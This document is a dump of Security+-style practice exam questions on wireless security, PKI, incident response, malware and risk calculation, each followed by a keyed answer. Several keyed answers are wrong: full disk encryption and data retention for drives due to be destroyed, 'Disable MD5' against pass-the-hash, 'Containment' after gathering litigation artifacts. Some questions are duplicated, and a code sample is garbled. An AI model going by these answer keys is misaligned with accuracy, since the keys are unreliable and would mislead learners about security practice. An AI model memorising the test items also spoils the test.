Ann, a sales manager, successfully connected her company-issued smartphone to the wireless network in her office without supplying a username/password combination. Upon disconnecting from the wireless network, she attempted to connect her personal tablet computer to the same wireless network and could not connect. Which of the following is MOST likely the reason? A. The company wireless is using a MAC filter. B. The company wireless has SSID broadcast disabled. C. The company wireless is using WEP. D. The company wireless is using WPA2.
A. The company wireless is using a MAC filter.
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). A. The firewall is disabled on workstations. B. SSH is enabled on servers. C. Browser homepages have not been customized. D. Default administrator credentials exist on networking hardware. E. The OS is only set to check for updates once a day.
A. The firewall is disabled on workstations. D. Default administrator credentials exist on networking hardware.
An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 204.211.38.52/24 after a firewall upgrade. The firewall rules are as follows: IP Address Protocol Port Number Action 204.211.38.1/24 ALL ALL Permit 204.211.38.211/24 ALL ALL Permit 204.211.38.52/24 UDP 631 Permit 204.211.38.52/24 TCP 25 DENY A. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP B. The deny statement for 204.211.38.52/24 should be changed to a permit statement C. The permit statement for 204.211.38.52/24 UDP 631 should be changed to UDP 443 instead of 631 D. The permit statement for 204.211.38.211/24 should be changed to TCP port 631 only instead of ALL
A. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP
An organization uses application whitelisting to help prevent zero-day attacks. Malware was recently identified on one client, which was able to run despite the organization's application whitelisting approach. The forensics team has identified the malicious file, conducted a post-incident analysis, and compared this with the original system baseline. The team sees the following output: filename hash (SHA-1) original: winSCP.exe 2d da b1 4a 98 fc f1 98 06 b1 e5 26 b2 df e5 f5 3e cb 83 el latest: winSCP.exe a3 4a c2 4b 85 fa f2 dd 0b ba f4 16 b2 df f2 4b 3f ac 4a e1 Which of the following identifies the flaw in the team's application whitelisting approach? A. Their approach uses executable names and not hashes for the whitelist. B. SHA-1 has known collision vulnerabilities and should not be used. C. The original baseline never captured the latest file signature. D. Zero-day attacks require the latest file signatures
A. Their approach uses executable names and not hashes for the whitelist.
Which of the following is the BEST reason for salting a password hash before it is stored in a database? A. To prevent duplicate values from being stored B. To make the password retrieval process very slow C. To protect passwords from being saved in readable format D. To prevent users from using simple passwords for their access credentials
A. To prevent duplicate values from being stored
If Organization A trusts Organization B and Organization B trusts Organization C, then Organization A trusts Organization C. Which of the following PKI concepts is this describing? A. Transitive trust B. Public key trust C. Certificate authority trust D. Domain level trust
A. Transitive trust
User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? A. Trust model B. Stapling C. Intermediate CA D. Key escrow
A. Trust model
Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? A. Trust model B. Stapling C. Intermediate CA D. Key Escrow
A. Trust model
An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? A. Tunnel mode B. Transport mode C. AH-only mode D. ESP-only mode
A. Tunnel mode
A recent spike in virus detections has been attributed to end-users visiting www.compnay.com. The business has an established relationship with an organization using the URL of www.company.com but not with the site that has been causing the infections. Which of the following would BEST describe this type of attack? A. Typo squatting B. Session hijacking C. Cross-site scripting D. Spear phishing
A. Typo squatting
An organization does not have adequate resources to administer its large infrastructure. A security administrator wishes to combine the security controls of some of the network devices in the organization. Which of the following methods would BEST accomplish this goal? A. Unified Threat Management B. Virtual Private Network C. Single sign on D. Role-based management
A. Unified Threat Management
A company has critical systems that are hosted on an end-of-life OS. To maintain operations and mitigate potential vulnerabilities, which of the following BEST accomplishes this objective? A. Use application whitelisting. B. Employ patch management. C. Disable the default administrator account. D. Implement full-disk encryption.
A. Use application whitelisting.
Pete, the system administrator, is reviewing his disaster recovery plans. He wishes to limit the downtime in the event of a disaster, but does not have the budget approval to implement or maintain an offsite location that ensures 99.99% availability. Which of the following would be Pete's BEST option? A. Use hardware already at an offsite location and configure it to be quickly utilized. B. Move the servers and data to another part of the company's main campus from the server room. C. Retain data back-ups on the main campus and establish redundant servers in a virtual environment. D. Move the data back-ups to the offsite location, but retain the hardware on the main campus for redundancy.
A. Use hardware already at an offsite location and configure it to be quickly utilized.
A security consultant wants to see what information can be obtained by banner grabbing the company's web servers. There are more than 100 web servers, and the consultant would like to perform and aggregate the information quickly. Which of the following is the MOST time-efficient way to accomplish this task? A. Use nc to establish a connection to each web server. B. Run tcpdump on each web server in the organization. C. Use dig to return results for each web server address. D. Run netstat on each webserver in the organization E. Use ssh to connect to port 80 on each web server.
A. Use nc to establish a connection to each web server.
A company has just adopted the BYOD deployment methodology. The company is unsure how to address the new trend and has requested assistance from a consultant. Given this scenario, which of the following should the consultant recommend? (Select TWO). A. Use password-enabled lock screens. B. Implement an MDM solution. C. Configure time-of-day restrictions. D. Disable personal email. E. Implement application whitelisting. F. Deny access to the corporate portal.
A. Use password-enabled lock screens. B. Implement an MDM solution.
Privilege creep among long-term employees can be mitigated by which of the following procedures? A. User permission reviews B. Mandatory vacations C. Separation of duties D. Job function rotation
A. User permission reviews
A company that processes sensitive information has implemented a BYOD policy and an MDM solution to secure sensitive data that is processed by corporate and personally owned mobile devices. Which of the following should the company implement to prevent sensitive data from being stored on mobile devices? A. VDI B. Storage segmentation C. Containerization D. USB OTG E. Geofencing
A. VDI
Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) A. Verify the certificate has not expired on the server B. Ensure the certificate has a .pfx extension on the server C. Update the root certificate into the client computer certificate store D. Install the updated private key on the web server E. Have users clear their browsing history and relaunch the session
A. Verify the certificate has not expired on the server C. Update the root certificate into the client computer certificate store
Jane has recently implemented a new network design at her organization and wishes to passively identify security issues with the new network. Which of the following should Jane perform? A. Vulnerability assessment B. Black box testing C. White box testing D. Penetration testing
A. Vulnerability assessment
A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report? A. Vulnerability scanner B. Protocol analyzer C. Network mapper D. Web inspector
A. Vulnerability scanner
A network administrator has been tasked with securing the WLAN. Which of the following cryptographic products would be used to provide the MOST secure environment for the WLAN? A. WPA2 CCMP B. WPA C. WPA with MAC filtering D. WPA2 TKIP
A. WPA2 CCMP
A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees? A. WPS B. 802.1x C. WPA2-PSK D. TKIP
A. WPS
Mike, a security professional, is tasked with actively verifying the strength of the security controls on a company's live modem pool. Which of the following activities is MOST appropriate? A. War dialing B. War chalking C. War driving D. Bluesnarfing
A. War dialing
Which of the following is characterized by an attacker attempting to map out an organization's staff hierarchy in order to send targeted emails? A. Whaling B. Impersonation C. Privilege escalation D. Spear phishing
A. Whaling
A server dedicated to the storage and processing of sensitive information was compromised with a rootkit and sensitive data was exfiltrated. Which of the following incident response procedures is best suited to restore the server? A. Wipe the storage, reinstall the OS from original media and restore the data from the last known good backup. B. Keep the data partition, restore the OS from the most current backup and run a full system antivirus scan. C. Format the storage and reinstall both the OS and the data from the most current backup. D. Erase the storage, reinstall the OS from most current backup and only restore the data that was not compromised.
A. Wipe the storage, reinstall the OS from original media and restore the data from the last known good backup.
Which of the following attacks would cause all mobile devices to lose their association with corporate access points while the attack is underway? A. Wireless jamming B. Evil twin C. Rogue AP D. Packet sniffing
A. Wireless jamming
A network administrator is reviewing the following IDS logs: ALERT: 192.168.1.20:1027 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1034 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:2041 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1165 -> 192.168.1.21:445 malicious payload detected Based on the above information, which of the following types of malware is triggering the IDS? A. Worm B. Logic bomb C. Rootkit D. Backdoor
A. Worm
A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform: A. a gray-box penetration test. B. a risk analysis. C. a vulnerability assessment. D. an external security audit. E. a red team exercise.
A. a gray-box penetration test.
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task? A. arp - s 192.168.1.1 00-3a-d1-fa-b1-06 B. dig - [email protected] mypc.comptia.com C. nmap - A - T4 192.168.1.1 D. tcpdump - lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:06
A. arp - s 192.168.1.1 00-3a-d1-fa-b1-06
A buffer overflow can result in: A. loss of data caused by unauthorized command execution. B. privilege escalation caused by TPM override. C. reduced key strength due to salt manipulation. D. repeated use of one-time keys.
A. loss of data caused by unauthorized command execution.
Sara, a security analyst, is trying to prove to management what costs they could incur if their customer database was breached. This database contains 250 records with PII. Studies show that the cost per record for a breach is $300. The likelihood that their database would be breached in the next year is only 5%. Which of the following is the ALE that Sara should report to management for a security breach? A. $1,500 B. $3,750 C. $15,000 D. $75,000
B. $3,750
Joe, the system administrator, has been asked to calculate the Annual Loss Expectancy (ALE) for a $5,000 server, which often crashes. In the past year, the server has crashed 10 times, requiring a system reboot to recover with only 10% loss of data or function. Which of the following is the ALE of this server? A. $500 B. $5,000 C. $25,000 D. $50,000
B. $5,000
During a penetration test from the Internet, Jane, the system administrator, was able to establish a connection to an internal router, but not successfully log in to it. Which ports and protocols are MOST likely to be open on the firewall? (Select FOUR). A. 21 B. 22 C. 23 D. 69 E. 3389 F. SSH G. Terminal services H. Rlogin I. Rsync J. Telnet
B. 22 C. 23 F. SSH J. Telnet
A bank has a fleet of aging payment terminals used by merchants for transactional processing. The terminals currently support single DES but require an upgrade in order to be compliant with security standards. Which of the following is likely to be the simplest upgrade to the aging terminals which will improve in-transit protection of transactional data? A. AES B. 3DES C. RC4 D. WPA2
B. 3DES
If two employees are encrypting traffic between them using a single encryption key, which of the following algorithms are they using? A. RSA B. 3DES C. DSA D. SHA-2
B. 3DES
The system administrator is tasked with changing the administrator password across all 2000 computers in the organization. Which of the following should the system administrator implement to accomplish this task? A. A security group B. A group policy C. Key escrow D. Certificate revocation
B. A group policy
Pete, the compliance manager, wants to meet regulations. Pete would like certain ports blocked only on all computers that do credit card transactions. Which of the following should Pete implement to BEST achieve this goal? A. A host-based intrusion prevention system B. A host-based firewall C. Antivirus update system D. A network-based intrusion detection system
B. A host-based firewall
Which of the following risk concepts requires an organization to determine the number of failures per year? A. SLE B. ALE C. MTBF D. Quantitative analysis
B. ALE
Of the following types of testing steps, which focuses on directly scanning a system, using techniques such as port scans, network mapping, ICMP scans to identify potential weaknesses? A. Operational reconnaissance B. Active reconnaissance C. Passive reconnaissance D. Initial exploitation
B. Active reconnaissance
A member of the human resources department is searching for candidate resumes and encounters the following error message when attempting to access popular job search websites: Site Cannot Be Displayed: Unauthorized Access Policy Violation: Job Search User Group: Retail_Employee_Access Client Address: 10.13.78.145 DNS Server: 10.1.1.9 Proxy IP Address: 10.1.1.29 Contact your systems administrator for assistance Which of the following would resolve this issue without compromising the company's security policies? A. Review the DNS settings and IP address on the employee's computer B. Add the employee to the less restrictive group on the content filter C. Remove the proxy settings from the employee's web browser D. Create an exception for the job search sites in the host-based firewall on the employee's computer
B. Add the employee to the less restrictive group on the content filter
A manufacturing company updates a policy that instructs employees not to enter a secure area in groups and require each employee to swipe their badge to enter the area. When employees continue to ignore the policy, a mantrap is installed. Which of the following BEST describe the controls that were implemented to address this issue? (Select TWO) A. Detective B. Administrative C. Deterrent D. Physical E. Corrective
B. Administrative D. Physical
After analyzing and correlating activity from multiple sensors, the security administrator has determined that a group of very well organized individuals from an enemy country is responsible for various attempts to breach the company network, through the use of very sophisticated and targeted attacks. Which of the following is this an example of? A. Privilege escalation B. Advanced persistent threat C. Malicious insider threat D. Spear phishing
B. Advanced persistent threat
A company has just completed a vulnerability scan of its servers. A legacy application that monitors the HVAC system in the datacenter presents several challenges, as the application vendor is no longer in business. Which of the following secure network architecture concepts would BEST protect the other company servers if the legacy server were to be exploited? A. Virtualization B. Air gap C. VLAN D. Extranet
B. Air gap
Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time? A. Security awareness training B. Antivirus C. Firewalls D. Intrusion detection system
B. Antivirus
A small- to medium-sized company wants to block the use of USB devices on its network. Which of the following is the MOST cost effective way for the security analyst to prevent this? A. Implement a DLP system B. Apply a GPO C. Conduct user awareness training D. Enforce the AUP
B. Apply a GPO
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST? A. Escalate the issue to senior management. B. Apply organizational context to the risk rating. C. Organize for urgent out-of-cycle patching. D. Exploit the server to check whether it is a false positive.
B. Apply organizational context to the risk rating.
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file? A. Unencrypted credentials B. Authentication issues C. Weak cipher suite D. Permission issues
B. Authentication issues
A security administrator has just finished creating a hot site for the company. This implementation relates to which of the following concepts? A. Confidentiality B. Availability C. Succession planning D. Integrity
B. Availability
The Quality Assurance team is testing a new third party developed application. The Quality team does not have any experience with the application. Which of the following is the team performing? A. Grey box testing B. Black box testing C. Penetration testing D. White box testing
B. Black box testing
Which of the following describes how Sara, an attacker, can send unwanted advertisements to a mobile device? A. Man-in-the-middle B. Bluejacking C. Bluesnarfing D. Packet sniffing
B. Bluejacking
A security analyst monitors the syslog server and notices the following: pinging 10.25.27.31 with 65500 bytes of data Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Which of the following attacks is occurring? A. Memory leak B. Buffer overflow C. Null pointer deference D. Integer overflow
B. Buffer overflow
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { car random_user_input[12]; stropy (random_user_input, bar); } Which of the following vulnerabilities is present? A. Bad memory pointer B. Buffer overflow C. Integer overflow D. Backdoor
B. Buffer overflow
Which of the following application attacks is used to gain access to SEH? A. Cookie stealing B. Buffer overflow C. Directory traversal D. XML injection
B. Buffer overflow
While opening an email attachment, Pete, a customer, receives an error that the application has encountered an unexpected issue and must be shut down. This could be an example of which of the following attacks? A. Cross-site scripting B. Buffer overflow C. Header manipulation D. Directory traversal
B. Buffer overflow
Which of the following components MUST be trusted by all parties in PKI? A. Key escrow B. CA C. Private key D. Recovery key
B. CA
An access point has been configured for AES encryption but a client is unable to connect to it. Which of the following should be configured on the client to fix this issue? A. WEP B. CCMP C. TKIP D. RC4
B. CCMP
A security administrator wants to implement a biometric system that can produce fewer false positives and negatives. When evaluating different biometric systems, which of the following is the MOST important factor to consider? A. FAR B. CER C. FRR D. ACL E. MFA
B. CER
A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue? A. SSL B. CRL C. PKI D. ACL
B. CRL
While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? A. PKI B. CRL C. CSR D. IPSec
B. CRL
Which of the following devices will help prevent a laptop from being removed from a certain location? A. Device encryption B. Cable locks C. GPS tracking D. Remote data wipes
B. Cable locks
Separation of duties is often implemented between developers and administrators in order to separate which of the following? A. More experienced employees from less experienced employees B. Changes to program code and the ability to deploy to production C. Upper level management users from standard development employees D. The network access layer from the application access layer
B. Changes to program code and the ability to deploy to production
A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to use interactive shell login. Which of the following configuration parameters should be implemented? (Select TWO). A. PermitTunnel B. ChrootDirectory C. PermitTTY D. AllowTcpForwarding E. IgnoreRhosts
B. ChrootDirectory C. PermitTTY
Which of the following security concepts would Sara, the security administrator, use to mitigate the risk of data loss? A. Record time offset B. Clean desk policy C. Cloud computing D. Routine log review
B. Clean desk policy
Which of the following does full disk encryption prevent? A. Client side attacks B. Clear text access C. Database theft D. Network-based attacks
B. Clear text access
Which of the following can Pete, a security administrator, use to distribute the processing effort when generating hashes for a password cracking program? A. RAID B. Clustering C. Redundancy D. Virtualization
B. Clustering
A security administrator discovers an image file that has several plain text documents hidden in the file. Which of the following security goals is met by camouflaging data inside of other files? A. Integrity B. Confidentiality C. Steganography D. Availability
B. Confidentiality
Following incident response best practices and processes, a forensic analyst compiles and selects artifacts requested by the legal team for litigation purposes. Given this scenario, which of the following steps should the analyst perform NEXT in the forensic process? A. Recovery procedures B. Containment procedures C. Eradication procedures D. Lessons learned procedures
B. Containment procedures
Pete, a network administrator, is capturing packets on the network and notices that a large amount of the traffic on the LAN is SIP and RTP protocols. Which of the following should he do to segment that traffic from the other traffic? A. Connect the WAP to a different switch. B. Create a voice VLAN. C. Create a DMZ. D. Set the switch ports to 802.1q mode.
B. Create a voice VLAN.
A server with the IP address of 10.10.2.4 has been having intermittent connection issues. The logs show repeated connection attempts from the following IPs: 10.10.3.16 10.10.3.23 212.178.24.26 217.24.94.83 These attempts are overloading the server to the point that it cannot respond to traffic. Which of the following attacks is occurring? A. XSS B. DDoS C. DoS D. Xmas
B. DDoS
During the analysis of a PCAP file, a security analyst noticed several communications with a remote server on port 53. Which of the following protocol types is observed in this traffic? A. FTP B. DNS C. Email D. NetBIOS
B. DNS
You have a user call you from a hotel saying there's an issue with your organization's web site and that it looks like it's been compromised. You check it from your work at it appears fine. What is a likely cause associated with the user at the hotel? A. Logic bomb B. DNS Poisoning C. Trojan horse D. Evil twin
B. DNS Poisoning
Users at a company report that a popular news website keeps taking them to a web page with derogatory content. This is an example of which of the following? A. Evil twin B. DNS poisoning C. Vishing D. Session hijacking
B. DNS poisoning
A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem? A. Storage multipaths B. Deduplication C. iSCSI initiator encryption D. Data snapshots
B. Deduplication
During a routine review of firewall log reports, a security technician notices multiple successful logins for the admin user during unusual hours. The technician contacts the network administrator, who confirms the logins were not related to the administrator's activities. Which of the following is the MOST likely reason for these logins? A. Firewall maintenance service windows were scheduled. B. Default credentials were still in place. C. The entries in the log were caused by the file integrity monitoring system. D. A blue team was conducting a penetration test on the firewall.
B. Default credentials were still in place.
A CSIRT has completed restoration procedures related to a breach of sensitive data is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO). A. A summary of approved policy changes based on the outcome of the incident B. Details of any communication challenges that hampered initial response times C. Details of man-hours and related costs associated with the breach, including lost revenue D. Details regarding system restoration activities completed during the response activity E. Suggestions for potential areas of focus during quarterly training activities F. Suggestions of tools that would provide improved monitoring and auditing of system access
B. Details of any communication challenges that hampered initial response times D. Details regarding system restoration activities completed during the response activity
A company's employees were victims of a spear phishing campaign impersonating the CEO. The company would now like to implement a solution to improve the overall security posture by assuring their employees that email originated from the CEO. Which of the following controls could they implement to BEST meet this goal? A. Spam filter B. Digital signatures C. Antivirus software D. Digital certificates
B. Digital signatures
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable MD5 C. Enable Kerberos D. Disable PAP
B. Disable MD5
A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable NTLM C. Enable Kerberos D. Disable PAP
B. Disable NTLM
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable NTLM C. Enable Kerberos D. Disable PAP
B. Disable NTLM
A security technician is attempting to improve the overall security posture of an internal mail server. Which of the following actions would BEST accomplish this goal? A. Monitoring event logs daily B. Disabling unnecessary services C. Deploying a content filter on the network D. Deploy an IDS on the network
B. Disabling unnecessary services
Ann, an employee, is cleaning out her desk and disposes of paperwork containing confidential customer information in a recycle bin without shredding it first. This is MOST likely to increase the risk of loss from which of the following attacks? A. Shoulder surfing B. Dumpster diving C. Tailgating D. Spoofing
B. Dumpster diving
A systems administrator wants to implement a secure wireless network requiring wireless clients to pre-register with the company and install a PKI client certificate prior to being able to connect to the wireless network. Which of the following should the systems administrator configure? A. EAP-TTLS B. EAP-TLS C. EAP-FAST D. EAP with PEAP E. EAP with MSCHAPv2
B. EAP-TLS
A security analyst finished drafting an official response to a security assessment report, which must be sent to the head of the auditing department. The security analyst needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the last steps the security analyst should perform prior to electronically sending the message? (Choose TWO) A. Hash the message. B. Encrypt the message. C. Digitally sign the message. D. Label the email as "Confidential" E. Perform key exchange with the recipient.
B. Encrypt the message. C. Digitally sign the message.
After recovering from a data breach in which customer data was lost, the legal team meets with the Chief Security Officer (CSO) to discuss ways to better protect the privacy of customer data. Which of the following controls support this goal? A. Contingency planning B. Encryption and stronger access control C. Hashing and non-repudiation D. Redundancy and fault tolerance
B. Encryption and stronger access control
Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices? A. Input validation B. Error handling C. Obfuscation D. Data exposure
B. Error handling
A security manager must remain aware of the security posture of each system. Which of the following supports this requirement? A. Training staff on security policies B. Establishing baseline reporting C. Installing anti-malware software D. Disabling unnecessary accounts/services
B. Establishing baseline reporting
You've been asked to conduct an internal vulnerability assessment for your organization. Which of the following steps should you avoid in determining system or network weaknesses to minimize risk? A. Non-intrusive reconnaissance B. Exploiting unpatched applications C. Review of system control configuration settings D. Scanning for unpatched systems
B. Exploiting unpatched applications
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN. As part of the discussions on the topic, several solutions are proposed. Which of the following controls, when implemented together, will address the protection of data-at-rest as well as strong authentication. (Select TWO). A. Containerization B. FDE C. Remote wipe capability D. MDM E. MFA F. OTA updates
B. FDE E. MFA
A security analyst has received the following alert snippet from the HIDS appliance: PROTOCOL SIG SRC.PORT DST.PORT TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001 TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455 TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack? A. The TCP ports on destination are all open. B. FIN, URG, and PSH flags are set in the packet header. C. TCP MSS is configured improperly. D. There is improper Layer 2 segmentation.
B. FIN, URG, and PSH flags are set in the packet header.
A vulnerability scan is reporting that patches are missing on a server. After a review, it is determined that the application requiring the patch does not exist on the operating system. Which of the following describes this cause? A. Application hardening B. False positive C. Baseline code review D. False negative
B. False positive
Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? A. Attestation B. Federation C. Single sign-on D. Kerberos
B. Federation
A company is preparing to decommission an offline, non-networked root certificate server. Before sending the server's drives to be destroyed by a contracted company, the Chief Security Officer (CSO) wants to be certain that the data will not be accessed. Which of the following, if implemented, would BEST reassure the CSO? (Select TWO). A. Disk hashing procedures B. Full disk encryption C. Data retention policies D. Disk wiping procedures E. Removable media encryption
B. Full disk encryption C. Data retention policies
After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination? A. tracert B. Fuzzer C. nslookup D. Nmap E. netcat
B. Fuzzer
A security analyst is doing a vulnerability assessment on a database server. The scanning tool returns the following information: Database: CustomerAccess1 Column: Password Data type: MD5 Hash Salted?: No There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select TWO). A. Start using salts to generate MD5 password hashes.. B. Generate password hashes using SHA-256 C. Force users to change passwords the next time they log on. D. Limit users to five attempted logons before they are locked out. E. Require the web server to only use TLS 1.2 encryption.
B. Generate password hashes using SHA-256 C. Force users to change passwords the next time they log on.
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test? A. Black box B. Gray box C. Credentialed D. White box
B. Gray box
A network administrator is configuring access control for the sales department which has high employee turnover. Which of the following is BEST suited when assigning user rights to individuals in the sales department? A. Time of day restrictions B. Group based privileges C. User assigned privileges D. Domain admin restrictions
B. Group based privileges
Which of the following protocols uses an asymmetric key to open a session and then establishes a symmetric key for the remainder of the session? A. SFTP B. HTTPS C. TFTP D. TLS
B. HTTPS
Your company's website has been defaced by an organization that doesn't agree with your corporate policies. What type of treat actor typically does this? A. Script kiddies B. Hacktivist C. Organized crime D. Insiders
B. Hacktivist
After entering the following information into a SOHO wireless router, a mobile device's user reports being unable to connect to the network: PERMIT 0A: D1: FA. B1: 03: 37 DENY 01: 33: 7F: AB: 10: AB Which of the following is preventing the device from connecting? A. WPA2-PSK requires a supplicant on the mobile device. B. Hardware address filtering is blocking the device. C. TCP/IP Port filtering has been implemented on the SOHO router. D. IP address filtering has disabled the device from connecting
B. Hardware address filtering is blocking the device.
Jane, a security analyst, is reviewing logs from hosts across the Internet which her company uses to gather data on new malware. Which of the following is being implemented by Jane's company? A. Vulnerability scanner B. Honeynet C. Protocol analyzer D. Port scanner
B. Honeynet
Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement? A. Role-based access control B. Honeypot C. Rule-based access control D. Password cracker
B. Honeypot
Which of the following should an administrator implement to research current attack methodologies? A. Design reviews B. Honeypot C. Vulnerability scanner D. Code reviews
B. Honeypot
A security engineer is working with the CSIRT to investigate a recent breach of client data due to the improper use of cloud-based tools. The engineer finds that an employee was able to access a cloud-based storage platform from the office and upload data for the purposes of doing work from home after hours. Such activity is prohibited by policy, but no preventive control is in place to block such activities. Which of the following controls would have prevented this breach? A. Network-based IPS B. Host-based DLP C. Host-based IDS D. NAC using TACACS+
B. Host-based DLP
Which of the following would an online retailer consider when selecting a backup facility, should there be a natural disaster that destroys its existing production datacenter? A. Off-site backups B. Hot site C. Warm site D. Cold site
B. Hot site
A company has proprietary mission critical devices connected to their network which are configured remotely by both employees and approved customers. The administrator wants to monitor device security without changing their baseline configuration. Which of the following should be implemented to secure the devices without risking availability? A. Host-based firewall B. IDS C. IPS D. Honeypot
B. IDS
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment access provisions of its services. Which of the following BEST represents the required cloud deployment model? A. SaaS B. IaaS C. MaaS D. Hybrid E. Private
B. IaaS
An organization wants to move its operations to the cloud. The organization's systems administrator will still maintain control of the servers, firewalls and load balancers in the cloud environment. Which of the following models is the organization considering? A. SaaS B. IaaS C. PaaS D. MaaS
B. IaaS
Pete's corporation has outsourced help desk services to a large provider. Management has published a procedure that requires all users, when receiving support, to call a special number. Users then need to enter the code provided to them by the help desk technician prior to allowing the technician to work on their PC. Which of the following does this procedure prevent? A. Collusion B. Impersonation C. Pharming D. Transitive Access
B. Impersonation
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO). A. Implement a reverse proxy. B. Implement an email DLP. C. Implement a spam filter. D. Implement a host-based firewall. E. Implement a HIDS.
B. Implement an email DLP. C. Implement a spam filter.
As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this? A. Require the use of an eight-character PIN. B. Implement containerization of company data. C. Require annual AUP sign-off. D. Use geofencing tools to unlock devices while on the premises.
B. Implement containerization of company data.
A security analyst identified a SQL injection attack. Which of the following is the FIRST step in remediating the vulnerability? A. Implement stored procedures. B. Implement input validations. C. Implement proper error handling. D. Implement a WAF.
B. Implement input validations.
During a recent audit, several undocumented and unpatched devices were discovered on the internal network. Which of the following can be done to prevent similar occurrences? A. Run weekly vulnerability scans and remediate any missing patches on all company devices B. Implement rogue device detection and configure automated alerts for new devices C. Install DLP controls and prevent the use of USB drives on devices D. Configure the WAPs to use NAC and refuse connections that do not pass the health check
B. Implement rogue device detection and configure automated alerts for new devices
When considering a vendor-specific vulnerability in critical industrial control systems which of the following techniques supports availability? A. Deploying identical application firewalls at the border B. Incorporating diversity into redundant design C. Enforcing application white lists on the support workstations D. Ensuring the systems' anti-virus definitions are up-to-date
B. Incorporating diversity into redundant design
Which of the following are the primary differences between an incremental and differential backup? (Select TWO). A. Incremental backups take more time to complete. B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup. D. Differential backups use less disk space on the storage drive. E. Incremental backups are less secure than differential backups. F. Differential backups are faster than incremental backups.
B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup.
Which of the following is the below pseudo-code an example of? IF VARIABLE (CONTAINS NUMBERS = TRUE) THEN EXIT A. Buffer overflow prevention B. Input validation C. CSRF prevention D. Cross-site scripting prevention
B. Input validation
